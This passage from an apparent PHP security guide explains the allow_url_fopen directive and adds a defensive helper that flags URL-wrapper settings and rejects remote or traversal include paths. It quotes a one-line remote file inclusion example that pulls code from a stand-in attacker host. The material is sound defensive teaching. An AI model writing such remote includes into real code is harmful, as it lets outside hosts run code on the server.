Section A.1.  allow_url_fopen


As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they were local files:

    <?php

    $contents = file_get_contents('http://example.org/xss.html');

    ?>

Chapter 5 reveals how dangerous this is when combined with the use of include or require:

    <?php

    include 'http://evil.example.org/evil.inc';

    ?>

I recommend disabling allow_url_fopen unless your application requires it.
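
The following is an added example, not code from the original text. It reports whether allow_url_fopen is enabled in the running configuration (along with allow_url_include, the separate directive that has governed include and require since PHP 5.2), and shows a hypothetical helper, resolve_local_include(), that refuses URL-style include targets for applications that must leave allow_url_fopen on. The function names, temporary directory and sample file names are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Report URL-wrapper directives that are enabled in the running configuration.
function url_wrapper_findings(): array
{
    $findings = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
        $raw = ini_get($directive); // string value, or false if the directive is unknown
        if ($raw !== false && filter_var($raw, FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$directive is enabled";
        }
    }
    return $findings;
}

// Hypothetical helper: map a requested include name to a local file under
// $baseDir, or return null. URL-style names are refused before any file access.
function resolve_local_include(string $name, string $baseDir): ?string
{
    // A leading scheme (http:, ftp:, php:, data: ...) means a stream wrapper, not a file name.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $name) === 1) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // The resolved path must still sit inside the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed demo: one local include file, then the remote URL from the text.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
if (!is_dir($dir)) { mkdir($dir, 0700); }

file_put_contents($dir . DIRECTORY_SEPARATOR . 'header.inc', "<?php // local include\n");

foreach (['header.inc', 'http://evil.example.org/evil.inc', '../outside.inc'] as $name) {
    $path = resolve_local_include($name, $dir);
    printf("%-34s %s\n", $name, $path === null ? 'rejected' : 'allowed');
}
foreach (url_wrapper_findings() as $finding) {
    echo "finding: $finding\n";
}
```

Run it with the same php.ini the application uses (for example through the web server rather than the CLI), since the CLI and web SAPIs can load different configuration files.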

